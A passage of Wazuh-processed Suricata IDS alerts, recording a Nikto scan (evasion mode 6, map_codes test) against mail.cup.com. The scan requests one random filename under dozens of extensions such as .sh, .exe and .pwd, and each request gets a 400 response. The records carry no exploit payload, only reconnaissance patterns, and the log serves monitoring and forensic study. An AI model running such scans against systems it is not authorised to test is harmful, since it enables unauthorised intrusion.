(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.581866+0000","flow_id":"1174823863246250.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47082","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.sh","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.585321+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":74,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.118400","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.585321+0000\",\"flow_id\":1629124028984059,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47084,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.cfc\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.585321+0000","flow_id":"1629124028984059.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47084","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.cfc","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.588333+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":75,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.119939","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.588333+0000\",\"flow_id\":1.72249232303402e+15,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47086,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.jse\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.588333+0000","flow_id":"1722492323034020.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47086","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.jse","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.590216+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":76,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.121482","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.590216+0000\",\"flow_id\":479451478163037,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47088,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.nlm\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.590216+0000","flow_id":"479451478163037.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47088","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.nlm","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.592132+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":77,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.123019","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.592132+0000\",\"flow_id\":88759778018679,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47090,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.printer\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.592132+0000","flow_id":"88759778018679.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47090","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.printer","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.594670+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":78,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.124562","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.594670+0000\",\"flow_id\":560166798495674,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47092,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.1\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.594670+0000","flow_id":"560166798495674.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47092","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.1","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.599159+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":79,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.126095","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.599159+0000\",\"flow_id\":1422785210098109,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47094,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.pwd\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.599159+0000","flow_id":"1422785210098109.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47094","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.pwd","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.601252+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":80,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.127634","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.601252+0000\",\"flow_id\":1543190323276216,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47096,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.cp866\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.601252+0000","flow_id":"1543190323276216.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47096","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.cp866","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.603136+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":81,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.129177","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.603136+0000\",\"flow_id\":1566365966807384,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47098,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.ida\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.603136+0000","flow_id":"1566365966807384.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47098","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.ida","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.612252+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":82,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.130716","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.612252+0000\",\"flow_id\":1249779632453529,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47100,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.wwwacl\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.612252+0000","flow_id":"1249779632453529.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47100","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.wwwacl","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.616417+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":83,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.132261","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.616417+0000\",\"flow_id\":2152744966841157,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47102,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.UploadServlet\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.616417+0000","flow_id":"2152744966841157.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47102","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.UploadServlet","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.628183+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":84,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.133820","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.628183+0000\",\"flow_id\":486941901094842,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47104,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.PWD\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.628183+0000","flow_id":"486941901094842.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47104","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.PWD","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.634992+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":85,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.135357","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.634992+0000\",\"flow_id\":278614512413618,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47106,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.ml\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.634992+0000","flow_id":"278614512413618.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47106","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.ml","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.638121+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":86,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.136892","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.638121+0000\",\"flow_id\":2193388242384897,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47108,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.exe\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.638121+0000","flow_id":"2193388242384897.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47108","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.exe","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.641116+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":87,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.138431","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.641116+0000\",\"flow_id\":1061393776952083,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47110,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.listprint\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.641116+0000","flow_id":"1061393776952083.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47110","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.listprint","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.646964+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":88,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.139982","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.646964+0000\",\"flow_id\":403035420023849,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47112,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.link\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.646964+0000","flow_id":"403035420023849.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47112","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.link","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.650090+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant 